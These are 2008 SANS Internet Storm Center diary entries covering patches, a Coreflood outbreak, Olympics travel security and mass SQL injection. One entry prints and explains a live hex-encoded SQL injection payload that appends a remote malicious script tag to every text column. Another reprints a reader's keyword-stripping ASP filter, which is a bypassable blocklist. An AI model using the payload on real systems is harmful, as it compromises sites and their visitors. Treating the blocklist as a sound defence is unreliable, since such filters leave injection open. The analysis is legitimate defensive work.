Diaries

0 Comments

Published: 2008-06-25

Report of Coreflood.dr Infection

We have had a report tonight of an outbreak of an old friend - a blast from the past. It appears that this particular outbreak has impacted/infected about 600 machines in a roughly 3000 pc network. Rick, our reader reporting this, said that they have not been able to determine the exact infection entry point yet but they suspect it is according to Rick:

"Current theory is iframe in web page browsed by an 'IU' (Idiot User). "

I like that line, don't you. Anyway, he said that they have discovered that this infection has resulted in a bunch of new user id's being created on the computers. When I asked him if they had discovered the mechanism used to spread to the machines, his reply was:

"My current theory is that the patient 0 system's user was set for sub-domain admin privs, and that allowed it to connect to the C$ share on other systems to infect those systems. Each time an infected system connected to a new system, a user profile was created on that new system. Eventually, all of those infected systems connecting to other systems gave the result of many (30+) user profiles on other systems."

He said that McAfee is reporting "buffer overflow" in a pop-up message on some of the systems and Norton is reporting it as Coreflood.dr.

Rick is hoping some of our readers may have dealt with this bad boy in the past and can provide us with a little insight into what they are seeing. Please let us know if you have any tips for Rick and his team.

3 Comments

Microsoft SQL Injection Prevention Strategy

Microsoft released a security advisory today in reaction to the mass SQL injection exploitation on the Internet. Unlike most other Microsoft's security bulletins and advisories, this one isn't about Microsoft products. In the advisory, "These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database."

Aside from providing links to information on SQL Injection, Microsoft recommends three approaches to help mitigate SQL Injection.

1. Runtime scanning

HP trimmed down a version of the WebInspect scanner to look for SQL injection vulnerabilities on a running website. Please note this scanner is very basic and should be used for a quick inspection only. I like the fact that the scanner has ability to dump table names, helps eliminate false positives.

2. URLScan

Microsoft's basic Web App Firewall solution. It has capabilities to block unwanted requests. This should only be used as a proactive measure or as emergency fix (short term) for SQL injection vulnerabilities.

3. Code Scanning

MS released a nice ASP source code scanning tool to look for SQL injection flaws. It is focused on SQL injection and seems to produce very few false positives which could be a problem with a lot of code scanners.

You may ask, runtime or code? The answer is both if you can do it. For example, if the ASP file calls a store procedure in the database and then the store procedure perform an exec and concatenate strings to run SQL within the database, code scanning will not flag this problem because the ASP code looks fine (only the store procedure is the problem). Conversely, runtime scanning can miss some portions of the site because this specific version of scanner do not follow Javascript and do not submit POST request during spider process.

Kudo to Microsoft for releasing the tools and information to help developers fix their apps. Also appreciate the free scanner from HP.

2 Comments

http://www.stickam.com/joelesler

Podcast Episode Seven Record Notice

Hey all, just to let you all know Johannes, Paul Asadoorian, (Of PaulDotCom Security Weekly fame) and I will be recording the Internet Storm Center Podcast (Episode 7) tonight at 7:30 pm EDT.

I'll be broadcasting it live on Stickam (Ustream seems to be having issues today):

Paul, Johannes, and I all have stickam accounts and we will all have live video and audio during the podcast, so you will be able to see and interact with all of us!

See you there if you can make it, we want to see if we can get a good amount of live listeners when we do the podcasts, stickam has a chat interface so you can give us LIVE feedback on the topics we are discussing on the podcast.

If you don't want to sign up for an account on Stickam, don't forget our IRC channel on irc.freenode.net, #dshield. So come and hang out, talk with us about topics, live!

Joel Esler

0 Comments

Adobe Reader and Acrobat 8.1.2 Security Update

Adobe released a security update today for Acrobat and Reader 8.1.2. It fixes a vulnerability which allows remote attacker to execute malicious code. This is likely to appear in a malware spreading website near you soon given the track record of the botnet operators. Suggest update this one as soon as possible, http://www.adobe.com/support/security/bulletins/apsb08-15.html

2 Comments

SQL Injection mitigation in ASP

With the recent SQL injection attacks on ASP pages. A lot of our readers are scrambling to find fixes for their applications. ASP is an older generation Web scripting language would require a bit more work to prevent SQL injection from happening. One of our reader Brian Erman has written a function to filter out the SQL keywords and also escape some the metacharacters in SQL to prevent SQL injection. from happening.

I have been asked a few times recently just how safe is escaping data before passing to SQL server. The answer is safe but it's not fool-proof, some of the issues have been documented by Chris Anley in his Advanced SQL Injection In SQL Server Application paper. Essentially, escaping input is making bad input less bad, so it's not ideal.

To stop SQL injection at the root, we have to understand that SQL injection happens because the database cannot effectively distinguish between static portion of the SQL statement and the user input. If there is a way we can tell the database - this is static SQL statement and this is user input, SQL injection could be stopped easily.

In actual fact, such mechanism exists, it is called parameterized query. The user input are passed to the SQL server as an argument (sort of like calling a function in programming language), the SQL server during query execution have a way to identify what part of the statement is static control, and which part is user input.

Parameterized queries have been widely publicized, examples are here and here. In classic ASP, parameterized query is possible if you use ADO command object, an example is here. Parameterized query is available on most other web scripting platforms, now is the time to review all your web app before the automated SQL injection exploitation spreads to other language platforms (PHP, CFM, PL)

Want to learn more about SQL injection mitigations? At SANSFIRE,, we will debut our new class, SEC522 "Defending Web Applications". Its an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.

0 Comments

Published: 2008-06-23

Preventing SQL injection

Here is a function that a reader wrote that does sanitizing of input for all inputted data.
I am not an asp function programmer so I can not claim that it is complete or correct
but it does appears to work.

This was written by Brian Erman.
Brian spent many hours testing and modifying to make it work. It has stopped
the insertion of bad data into their database. They have been using it now for
over 1 month and have not had a single SQL injection since they added this function.

It eliminates any string that contains the word "declare" and shoots them
off to Google. It also creates a new string from the old string character by
character into the new string. Not by moving the original character into the string.

It also replaces known keywords (i.e. insert, delete, etc...) that may cause
problems within SQL.

,,,,,,Begin Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Function cleanchars(str)
'this gets put in the program that you want to cleans the data with.
'fname = cleanchars(trim(Request("xxxxx"))) <<<Function Call<<<<<<
'here is the call for the function
'Author:
'President Brian Erman
'Nopork Motorsports, Inc.
'2585 Hamner Ave,
'Norco CA 92860
'
'This is licensed under the creative commons attribution-noncommercial 3.0 framework
'http://creativecommons.org/licenses/by-nc/3.0/us/
'
'This function assumes you are using CDO as your object for sending mail, if
'you have CDONTS on your server, simply change the CDO to CDONTS and it
'should process exactly the same.
'
'
newstr = ""

if InStr(str, "'") > 0 then
    str = ""
    end if

if instr(str, "DECLARE") > 0 then
    newstr = ""
    Set Mailer = Server.CreateObject("CDO.Message")
    Mailer.From = "Email_From"
    Mailer.To = "Email_To"
    Mailer.Subject = "Your_Domain Hacking Attempt"
    msg = Date & VbCrLf & VbCrLf
    msg = msg & "Hacking Blocked, but check the data" & VbCrLf & VbCrLf
    msg = msg & "STR: " & str & " char " & char & VbCrLf & VbCrLf
    msg = msg & "Here is the IP " & Request.ServerVariables("REMOTE_ADDR") & VbCrLf & VbCrLf
    msg = msg & "Web Page " & Request.ServerVariables("URL") & VbCrLf & VbCrLf
    msg = msg & "Host " & Request.ServerVariables("HOST") & VbCrLf & VbCrLf
    msg = msg & "Length of String " & len(str) & vbcrlf & vbcrlf
    Mailer.TextBody = msg
    Mailer.Send
    Set Mailer = nothing
    Response.Redirect("http://www.google.com/")
end if

For ii = 1 to Len(str)
        char = Mid(str,ii,1)
Select Case char
        case " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y",
"z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2",
"3", "4", "5", "6", "7", "8", "9", "@", ".", "-", "_", "/", "&"
        newstr = newstr & char
Case Else

    Set Mailer = Server.CreateObject("CDO.Message")
    Mailer.From = "Email_From"
    Mailer.To = "Email_To"
    Mailer.Subject = "Your_Domain Hacking Attempt"
    msg = Date & VbCrLf & VbCrLf
    msg = msg & "Hacking Blocked, but check the data" & VbCrLf & VbCrLf
    msg = msg & "STR: " & str & " char " & char & VbCrLf & VbCrLf
    msg = msg & "Here is the IP " & Request.ServerVariables("REMOTE_ADDR") & VbCrLf & VbCrLf
    msg = msg & "Web Page " & Request.ServerVariables("URL") & VbCrLf & VbCrLf
    msg = msg & "Host " & Request.ServerVariables("HOST") & VbCrLf & VbCrLf
    msg = msg & "Length of String " & len(str) & vbcrlf & vbcrlf
    Mailer.TextBody = msg
    Mailer.Send
    Set Mailer = nothing

End Select
Next

if len(str) > 350 then
    newstr = ""
    Response.Redirect("http://www.Your_Domain/")
    end if

if instr(str, "DECLARE") > 0 then
    newstr = ""
    Response.Redirect("http://www.Your_Domain/")
    end if


if instr(str, "declare") > 0 then
    Response.Redirect("http://www.Your_Domain/")
    end if

if instr(str, "www") > 0 then
    Response.Redirect("http://www.Your_Domain/")
    end if

    newstr = Replace(lcase(newstr), " or ", "")
    newstr = Replace(lcase(newstr), " and ", "")
    newstr = Replace(lcase(newstr), " from ", "")
    newstr = Replace(lcase(newstr), " into ", "")
    newstr = Replace(lcase(newstr), "insert", "")
    newstr = Replace(lcase(newstr), "update", "")
    newstr = Replace(lcase(newstr), "set", "")
    newstr = Replace(lcase(newstr), "where", "")
    newstr = Replace(lcase(newstr), "drop", "")
    newstr = Replace(lcase(newstr), "values", "")
    newstr = Replace(lcase(newstr), "null", "")
    newstr = Replace(lcase(newstr), "http", "")
    newstr = Replace(lcase(newstr), "js", "")
    newstr = Replace(lcase(newstr), "declare", "")
    newstr = Replace(lcase(newstr), "script", "")
    newstr = Replace(lcase(newstr), "xp_", "")
    newstr = Replace(lcase(newstr), "CRLF", "")
    newstr = Replace(lcase(newstr), "%3A", "")'; HEX
    newstr = Replace(lcase(newstr), "%3B", "")':
    newstr = Replace(lcase(newstr), "%3C", "")'<
    newstr = Replace(lcase(newstr), "%3D", "")'=
    newstr = Replace(lcase(newstr), "%3E", "")'>
    newstr = Replace(lcase(newstr), "%3F", "")'?
    newstr = Replace(lcase(newstr), """, "")'"
    newstr = replace(lcase(newstr), "&", "")'&
    newstr = replace(lcase(newstr), "<", "")'<
    newstr = replace(lcase(newstr), ">", "")'&
    newstr = replace(lcase(newstr), "exec", "")'&
    newstr = replace(lcase(newstr), "onvarchar", "")'&
        newstr = replace(lcase(newstr), "set", "")'&
    newstr = replace(lcase(newstr), " cast ", "")'&
    newstr = replace(lcase(newstr), "00100111", "")'
    newstr = replace(lcase(newstr), "00100010", "")';
    newstr = replace(lcase(newstr), "00111100", "")'<
    newstr = replace(lcase(newstr), "select", "")'<
    newstr = replace(lcase(newstr), "0x", "")'<
    newstr = replace(lcase(newstr), "exe", "")'<
    newstr = replace(lcase(newstr), "delete", "")'<
    newstr = replace(lcase(newstr), "go ", "")'<
    newstr = replace(lcase(newstr), "create", "")'<
    newstr = replace(lcase(newstr), "convert", "")'<

    cleanchars = newstr

    End Function
,,,,,,End Function,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Additionally several sites have published documents describing how to prevent SQL injection.
Open Web Application Security Project:
http://www.owasp.org/index.php/Preventing_SQL_Injection_in_Java#Defence_Strategy

Canadian Cyber Incident Response Centre:
http://www.publicsafety.gc.ca/prg/em/ccirc/_fl/tr08-001-Alleviating-the-threat-of-mass-sql-injection-attacks-eng.pdf

1 Comments

Published: 2008-06-23

SSH scans, source port 80?

Got an email today from a reader named Justin (thank you Justin) who asks us if we have seen alot of SSH scans with a source port of 80 before. Of course, the answer is yes, but only in test cases!

I've never actually seen this take place on the internet, (well, yes, I have, but very very rarely), and of course I can cause it with certain nmap settings. But this kind of scanning isn't commonplace, afaik, to an automated tool or script kiddie run.

Any information that anyone could provide so that we can help out Justin, and of course the rest of the readers of the Internet Storm Center would be much appreciated. Please write in via that Contact link at the top of our home page. Thank you.

Joel Esler

MS08-030: Vulnerability in Bluetooth stack could allow remote code execution

0 Comments

Published: 2008-06-20

BackTrack 3 Released

Over at Remote-Exploit.Org, BackTrack 3 has been released. Thanks Max, Muts, MjM! and Raul.
The download link is BackTrack 3.

BackTrack

0 Comments

Published: 2008-06-20

Safari 3.1.2 for Windows released to address vulnerabilities

Safari 3.1.2 for Windows was released to address;

CVE-ID: CVE-2008-1573
Available for: Windows XP or Vista
Impact: Viewing a maliciously crafted BMP or GIF image may lead to information disclosure

CVE-ID: CVE-2008-2540
Available for: Windows XP or Vista
Impact: Saving untrusted files to the Windows desktop may lead to the execution of arbitrary code

From - "About the security content of Safari 3.1.2 for Windows"

Safari 3.1.2 for Windows - "This update is recommended for all Safari Windows users and includes stability improvements and the latest security updates".

Thanks to all of the folks that submitted links!

0 Comments

Published: 2008-06-20

MS08-030 has a new patch, for XP SP2 & XP SP3

Microsoft issued a new patch, for XP SP2 & XP SP3, for MS08-030: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action".

The Technet Security Vulnerability Research & Defense blog on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".

Thanks for the heads-up Guy

0 Comments

Published: 2008-06-19

Firefox vunerability

Firefox, up to and including the just-released Firefox 3, has a vulnerability. Details about the exact nature of the bug are being withheld until a patch is made available.

Additional coverage of the issue can be found at:

http://dvlabs.tippingpoint.com/blog/2008/06/18/vulnerability-in-mozilla-firefox-30
http://news.yahoo.com/s/pcworld/20080619/tc_pcworld/147277
http://secunia.com/advisories/30761/
http://www.f-secure.com/weblog/archives/00001458.html
http://computerworld.com/action/article.do?command=viewArticleBasic&articleId=9100878&intsrc=hm_list
http://computerworld.com/action/article.do?command=viewArticleBasic&articleId=9100558&intsrc=hm_list

-- Bill Stearns, http://www.stearns.org

0 Comments

Published: 2008-06-19

Time Warner outage

Time Warner appears to be experiencing an outage of an OC-192 link in Ohio. Chad and one other reader report that this is giving both throughput, latency and stability problems.

-- Bill Stearns, http://www.stearns.org

UPDATE: Information received indicates it is all back to normal (Thanks Chad)

0 Comments

Published: 2008-06-18

Cisco Security Advisory

Cisco Intrusion Prevention System (IPS) platforms that have gigabit network interfaces installed and are deployed in inline mode contain a denial of service vulnerability in the handling of jumbo Ethernet frames. This vulnerability may lead to a kernel panic that requires a power cycle to recover platform operation. Platforms deployed in promiscuous mode only or that do not contain gigabit network interfaces are not vulnerable.

Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability.

This advisory is posted here

0 Comments

Published: 2008-06-18

Olympics Part II

On June 16th we published a short diary asking for comments about the dangers of bringing laptops, PDAs, cell phones, etc. to China if you are planning to attend the Olympics in August. We've received a number of interesting comments and I want to share two of them with our readers. I have not made any changes, these are cut/paste right out of the emails we received. If you have any comments, you can use the comment button at the bottom of the diary entry or send us your notes via our contact page.

One reader wanting to remain anonymous said:

We are recommending our users be very aware of the devices they take with them. We have recommended leaving all but essential electronic communications and storage devices behind, to include cellular phones with any storage capability. Users should be aware of the presence of their equipment at all times, not leaving personal or professional equipment unattended, in a hotel room, or locker for any amount of time, and be ultimately suspicious of any portable storage device purchased, received, or given to/from another party while travelling. This includes USB, CD, SD (other variations) or any other flash media. I am particularly concerned with the custom trojan infections coming back through flash-based medias from traveling parties, whether through their personal computers cross-contaminating professional assets, or on media that they bring into the workplace. These trojan variants typically evade AV for up to three months, are very slow to spread, and present deep, slow infiltration into the machine whose backchannels can lead to data loss and lateral control of other machines.

Protecting the enclave from those that return to the workplace with such an infection relies on strong program whitelists ('gold disks'), standard images, and possibly mandated reimaging on return with all returning data stored to CD media, scanned, and manually reviewed for autorun.inf infection vectors prior to reintroduction. Support for strong policy enforcement from the highest levels with crystal clear consequences is essential to prevent the enticement of easy work-arounds for returning workers. Returning expats should have an in-briefing meeting and sign a statement indicating that they have reviewed the policy, are aware of its meaning, and have not brought back any non-company media to the best of their knowledge. At that time, they are given a one-time opportunity for amnesty to provide anything they may have forgotten to leave behind.

This may seem harsh, but how valuable is control of company assets, core data, proprietary secrets, etc? If you don't protect it, China has made it very clear that 'no holds barred' is fair game and they WILL take it to their full advantage.

Another anonymous reader had this to say:

I think it might be even more useful to turn the question posed completely around...

What do we observe foreign nationals doing when they visit/meet with us in an official capacity on our soil?

The "us" and "our" being the USA and "official" meaning rubber-meets-the-road business/corporate critical meetings (often times under muti-party/muti-lateral NDA-s, to protect real intellectual property, representing tangible products, resulting from millions of name-that-currency spent on R&D).

Having participated in a few of these meetings, of late, I can say that senior scientists and engineers employed by great Asian nations have not been bringing any laptops/notebooks/gadgets to said meetings.

When they carry cel phones/PDAs, these are all scrupiously powered off and tucked out of sight, prior to entering "foreign" (to them) corporate campuses. It is a parking lot ritual of sorts that I have personally witnessed.

All notes they take are written on paper. (As are mine, which I review and flesh out from memory as soon as the last goodbye-s are exchanged.)

Any electronic presentations they bring are on hardware write-protected USB solid state storage and the meeting's host is expected to provide the computer that will run the presentation (either PowerPoint or PDF).

Sometimes there are only printed handouts, which may or may not be collected at the conclusion of the meeting. (Usually handouts that are to be re-collected are uniquely marked in advanced.)

Of course, every one of "us" (myself excluded) attends these same meetings with our laptop/notebook/tablet, cel phone, PDA powered on *and* wireless enabled.

Many of the latest gee-whiz compute/communicate devices that our Asian counterparts are using day-to-day these days are not for sale on our shores. We are often times disappointed when we do not get to see these trinkets on display at these meetings.

What many of us fail to realize is that our auspicious visitors/guests are voluntarily abiding by a scrupulous electronic quarantine, in specific situations, while on our soil.

Whereas, too many of us tend to be electronic cowboys, with our "rigs" fully exposed, whether or not we happen to be travelling abroad.

Food for thought???...

The same anonymous reader had these additional comments:

For "Mark," even if his crew is using terminal services on as-is off-the-shelf stock, what about keystroke loggers and/or rootkits, on the terminal services client machine, that could be planted over-the-wire(less) and need not persist beyond a single snoop session???

I am a firm believer in hardening all portable compute devices, as much as they can be, whether or not they're to be taken abroad.

As-is, from the manufacturer, all my Vista notebooks have had crap like Bluetooth and Firewire services enabled, whether or not there is an internal Bluetooth device or even a Firewire port, by default.

Presumably, these services are pre-enabled just in case I (or anyone else) decides to plug in an USB-bridged and/or PCMCIA Bluetooth or Firewire device.

How convenient for me... and all of my would-be attackers.

Why should every physical port present (or not) on a mobile compute platform be permitted to become a potentially illicit port of entry/leakage???

I prefer to disable everything I don't need for the job and selectively enable what do I need, as much as possible, for only while I need to use it.

Seriously consider fully supporting (Vista) BitLocker or some other full disk encryption on business critical mobile compute platforms, as well as on removable storage. MS does not encrypt the pagefile (although I've been told that MacOS does) and some terminal services session data will likely persist for a while in a large pagefile.

At the very least, I say make the BadGuys(TM) work for pwnership.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-06-17

Why go high-tech?

We received a report today from an EDU that received hundreds of undeliverable notices from other EDU domains. Their "helpdesk" email box had been used as the spoofed from address in a simple "ask for the user's password to avoid account closure" attempt to gather email account passwords from unsuspecting college students. But instead of going to a website, user is just supposed to send the account details to an email address at the bottom of the page. Turns out that a couple of them replied with their account details to the EDU, instead of the attacker. It is somewhat of a catch-22 for the attacker - use a more official "from" address and user is more likely to reply; but the same user is likely not to follow the directions at the bottom of the message stating send your reply to xyz@attacker.com.

The story reminds me of "stupid criminal" stories. But on the Internet, there is less chance of getting caught and more likelihood that someone will fall for the attack.

0 Comments

Published: 2008-06-16

Going to the Olympics?

Are you or one of your organization's employees planning to attend the Olympics in Beijing this August? If so, are there any precautions you are taking (or recommending for your staff to take) when bringing computers, PDAs, or other electronics potentially containing intellectual property on a trip to China? I'm not suggesting that China is a dangerous place (after all, nearly anywhere on the planet you can find trouble) but there has been a lot of talk recently about cybersecurity issues in China.

So we are curious, what are you doing to protect your organization against potential theft, or even worse - the potential addition of "value added features" to your computers and devices while you are not looking? Send us your ideas, concerns, and comments and we'll add the best ones to this diary. You can also use the "comment" feature below to directly add your thoughts.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-06-16

Firefox 3.0 to be Released on Tuesday

There is a lot of buzz about the new version of Firefox coming out tomorrow (Tuesday, June 17). See these links for more information:

http://www.mozillazine.org/talkback.html?article=23936

http://www.dria.org/wordpress/archives/2008/06/12/655/

http://software.silicon.com/os/0,39024651,39246115,00.htm

http://www.mozilla.com/en-US/firefox/all-rc.html

http://mozillalinks.org/wp/2008/06/firefox-3-rc-2-review/

http://www.spreadfirefox.com/

http://www.mozilla.com/en-US/firefox/?from=getfirefox

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2008-06-16

Opera 9.5 is Available

Parth just informed us that Opera 9.5 is available at: www.opera.com/

This version addresses a few security issues: www.opera.com/docs/changelogs/windows/950/#security

1 Comments

Published: 2008-06-15

Happy Father's Day

In most countries June 15th is Father's Day this year. So, to all of the dads out there in reader-land, we extend our warmest Happy Father's Day wishes. Kids, be sure to call the Old Man today if you are no longer living at home and tell him how you are doing. If you are still living in your parent's basement, then come upstairs and tell him how much you appreciate that high-speed Internet connection he's paying for. :)

While you are on the phone (or IM'ing) with Dear Old Dad, ask him if he's got automatic updates turned on for the home computer and if he keeps his antivirus software updated. Also check to make sure that he's got a good firewall in place. Those three things will keep most of the evilware out of the family computer. Beyond that, we can't stop Dad from surfing to parts of the Internet he should not be going to, from downloading lots of cool widgets and programs, or from engaging in file swapping. But we can keep him educated on the latest threats and countermeasures.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-06-14

Malware Detection - Take the Blinders Off

How many times have you sat in a discussion talking about how to protect against malware and the focus is always on what type of Antivirus to use? Do you use one vendor to keep it simple or do you use at least two vendors to get better coverage? I don't disagree that antivirus software is an essential tool in your security architecture and I'm an advocate of it. But my point is that we have severely restricted our abilities to detect malware when the only focus is only an antivirus solution. When this is the case, you are operating with blinders on.

Malware development and usage is a rapidly growing area of concern. Sadly, the developers of malware are getting better and better at fine tuning their craft. Malware today is very sophisticated with amazing GUI interfaces that make it so easy anyone can use it with no skills required. It is too easy to create malware that is not detected by antivirus software. Sadly, by the time the malware is found and detection is provided many days may have passed. Take Slammer for instance and the fact it infected the majority of the 75,000 systems it compromised within the first ten minutes. How do you get a signature out to detect something that moves that fast? The answer is simple...you can't!!

The use of signature based detection has its limitations and developments in behavioral and heuristic based approaches aren't where they need to be yet. This is not a slam against any antivirus vendors. I'm simply advocating that we need to take the blinders off an look at other ways we can do detection to increase our security posture. Just to clarify, I use the term "forensics" because I look at forensics as the art of looking for clues. That is really what you're doing in all of these. Looking for clues that would help you spot malware. Call it whatever you want:>) Here are some things that can be used to monitor for malware.

Network Forensics
Network forensics is a method to examine the characteristics of your network traffic and provide early alert warning. One of the guiding principles when doing any type of analysis is to learn what is normal. If you learn what is normal, the abnormal will immediately stand out to you. All network traffic has patterns that are unique to that network. By watching your network traffic, you can determine rapidly what is abnormal. With network speeds today, one of the best methods of doing this is graphical analysis. They are many tools out there that will graphically display your communication flows. You can visually see where your traffic is going and abnormal traffic patterns instantly stand out. For instance, if your watching your connections and suddenly 2 boxes, then 10, then 20 etc. all start trying to connect to IP address that is not their normal pattern, you would want to check that out. If its malware related, you will be able to find out very quickly and provide protection for your network. With visual monitoring, abnormalities stand out very quickly.

Web traffic Forensics
I also recommend doing forensics on your web traffic. The same methodology applies. Look for the abnormalities in your traffic. Since port 80 is open, its a good target. I wrote a diary a while back on a piece of undetected malware that used a covert channel over port 80 to get its commands. Forensics on your web traffic would have spotted that site suddenly showing up at repeated intervals in your analysis.

Host Based Forensics
You should know what your basic build is for all your systems. Using a good tool to alert you for changes is another method of early detection. You can also do forensics on your logs by monitoring for key events such as services starting or new processes being added. You can run a local script at night on each system to send you a list of services and processes that are running on the systems. That can be automated to be compared against a known list and the outliers written to a file for further analysis. (Note, I recommend at night because the systems will be more stable as to what is running)

The bottom line is to think outside the box and be creative (with permission of course)!! Set up a Darknet, use LaBrea on an unused network space in your environment, watch for increased traffic to certain ports or whatever comes to mind. Just don't depend on your antivirus to be your only solution for detection of malware. We all need to move toward being proactive and not reactive. If you have implemented something to help look for malware, please let us know and we'll combine the methods and update the diary.

Happy Hunting!

0 Comments

Published: 2008-06-13

Floods: More of the same (2)

As expected, we do see a number of domain name registrations referencing the floods and tornados in Iowa. At this point, we haven't seen any obvious donation scams. Most of the domains are just parked, others offer news summaries and appear to try to make some money with Google ads. Please let us know if you run into any scams. As usual, please donate to reputable organizations. Try to avoid organizations you never heard before.

The IRS offers a database of tax exempt charities here: http://www.irs.gov/charities/article/0,,id=96136,00.html

------

Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center

0 Comments

Published: 2008-06-13

Podcast Episode Six

Just a quick note to let everyone know that we put out Podcast Episode 6 this morning, we tried to go alphabetically through all the topics (and there were a bunch). Larry Pesce of PaulDotCom Security Weekly was able to join us mid-show.

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.

As always we are looking for listener feedback, be sure and write in!

Joel Esler

0 Comments

Published: 2008-06-13

SQL Injection: More of the same

We continue to receive more reports of SQL injection attacks, using updated URLs. One fo the "neat" features of this exploit is how it uses one single SQL statement which will pull all the necessary information from the database itself. Here is the latest version (thanks Jakub for submitting this!):

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056 41524348415228323535292C404320564152434841522832353529204445434C4152 45205461626C655F437572736F7220435552534F5220464F522053454C45435420612 E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C73797363 6F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970 653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335 204F5220622E78747970653D323331204F5220622E78747970653D31363729204F5045 4E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C 655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535 4415455533D302920424547494E20455845432827555044415445205B272B40542B275D 20534554205B272B40432B275D3D525452494D28434F4E564552542856415243484152 2834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E6164736974656C6F2E636F6D2F622E6A733E3C2F7363726970743E2 7272729204645544348204E4558542046524F4D205461626C655F437572736F7220494 E544F2040542C4043204

We have looked at these before. But let me re-iterate step by step what exactly is happening here:
First of all, we got a bit of URL encoding here. The "%20" represents a space. This turns the SQL statement into:

DECLARE @S VARCHAR(4000); SET @S=CAST(....

First a variable '@S' is declared as a "varchar" (comparable to a "string" in other languages) with a length of 4000 characters. Then, the output of 'CAST' is assigned to the variable. CAST is just used to turn the long hex string into a "varchar".

Bojan told us in an earlier diary how to convert the hex string using perl. In this case, we end up with:
(I slightly modified the included URL by adding spaces and turning http to hxxp. We had issues in the past with proxies flagging our diaries as "malicious").
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+ ''''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Lets go over this line by line:

First, two variables (T and C) are declared

DECLARE @T VARCHAR(255),@C VARCHAR(255) Next, we declare a "table_cursor". A table cursor will receive the output of a query line by line. It's essentially a "for" loop over all results returned by the query

DECLARE @T VARCHAR(255),@C VARCHAR(255) The cursor is defined for the following query:
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

This SQL query uses one particular trick: sysobject is a special table in SQL Server. It lists all the other tables available. syscolumns works similar for all columns found in these tables.

The query selects all "objects" with an xtype of "u". These are tables created by the user. System tables (like "sysobjects" and "syscolumns" are ignored). Next, it limits it to columns of type 35 (text), 231 (sysname) and 167 (varchar). These are datatypes that can hold a string of characters.

Our "cursor" will now retrieve all the results, and assign them to the variables "T" (table name) and "C" (column name)

Update... initially I posted the script part wrong. A couple readers pointed out that it was actually not escaped right. Our diary editor doesn't do that on purpose as handlers sometimes need to add html/javascript/css to make a diary "work"... well, luckily I at least escaped the script part... stuff happens

. The next sql statement will use these variables:

BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+ "<script src=hxxp://www. adsitelo .com/b.js></script>")

For all values of these selected columns, the malicious javascript is added. As a result, you will see the javascript littered throughout the application. Wherever the website is using a string from the database, the javascript is now added. You frequently see it as part of the title tag.

Finally: How to defend against this? The "simple" answer is of course to just not have any SQL injection faults. But that's easier said then done, in particular for an existing legacy application. A couple other things you can do:

limit the database user the web application uses. Maybe it doesn't have to update anything, or only few tables
Monitor your webapplication for SQL errors. These statements may create some errors if your web application doesn't have sufficient privileges
keep a close eye on your data and your application. Look for new javascript in titles and other spots that shouldn't have any

And finally: At SANSFIRE,, we will debut our new class, SEC522 "Defending Web Applications". Its an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.

------
Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center

0 Comments

Published: 2008-06-12

Safari on Windows - not looking good

Last month Mark posted a diary about a security issue for users using Safari on Windows. There has been a lot of discussion about this over the past few weeks. The issue is not a typical security vulnerability in a product, but a blended threat that is specific for Safari on Windows – a combined attack called "Safari Carpet Bomb".

Over the last weekend, a security researcher released proof of concept code that exploits this "feature" in Safari with another "feature" in Windows (yeah, a lot of "features" working together = a vulnerability).

The two "features" we're talking about here are these:

In some cases, Internet Explorer will load DLLs from Desktop. This is an old "feature" that has been known since December 2006. It also works, as far as I'm aware, only with Internet Explorer 7 (and probably 8 beta) on Windows XP. My tests failed on Vista.
Safari for Windows will, by default, save files on Desktop. This would not normally be a problem, but Safari does that without any prompts to the user (Firefox does the same, for example, but prompts the user before saving the file).

